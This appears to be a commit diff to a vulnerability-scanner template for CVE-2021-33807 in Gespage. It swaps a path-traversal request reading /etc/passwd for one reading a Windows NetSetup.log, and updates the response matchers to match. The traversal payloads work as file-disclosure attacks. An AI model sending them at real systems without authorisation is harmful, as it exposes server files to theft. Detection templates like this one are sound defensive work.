Update CVE-2021-33807.yaml

patch-1
Prince Chaddha 2021-08-16 13:55:31 +05:30 committed by GitHub
parent b426441cf4
commit 272dec095d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 4 deletions

View File

@ -13,14 +13,20 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: word
words:
- "NetpDoDomainJoin:"
part: body
- type: word
words:
- "application/octet-stream"
part: header
- type: status
status: